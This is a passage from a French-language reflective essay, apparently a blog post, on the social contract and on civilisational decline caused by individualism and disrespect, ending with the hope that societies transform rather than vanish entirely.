contrat social qui nous lie tous l’un à l’autre dans un seul but, un objectif commun, une survie commune. Celui-ci est de maintenir et de faire progresser tant le bien-être des individus qui forment la collectivité, que de celui de l’ensemble de la société, de la civilisation en tant qu’entité holistique. Comme disait Tolstoï, “Les hommes sont des rouages qui servent à bâtir l’Histoire.”

Mais qu’arrive-t-il quand nos piliers sont corrompu? Quand l’individualisme et le je-m’en-foutisme à outrance, l’insolence et le manque de respect pour l’autre, pour les biens de l’autre, pour la société en général, l’ignorance, quand cet affront généralisé contre la collectivité lentement effrite le mortier qui lie l’ensemble? Alors la structure n’a plus de support, le toit protecteur s’effondre, les murs de nos conventions s’écroulent et la société devient dysfonctionnelle…

Tel est le triste constat que l’on doit faire sur l’état de notre civilisation. Elle semble bientôt destinée à disparaître…

Mais, bon, les babyloniens, les égyptiens, les grecs et les romains ont tous fait ce même constat avant nous, à un moment ou à un autre. Leurs civilisations ont certes disparu mais jamais totalement. Elle se sont transformées, ont été absorbées, pour devenir l’étape suivante de l’Humanité. Alors, peut-être, tout n’est-il pas perdu?

[ Translate ]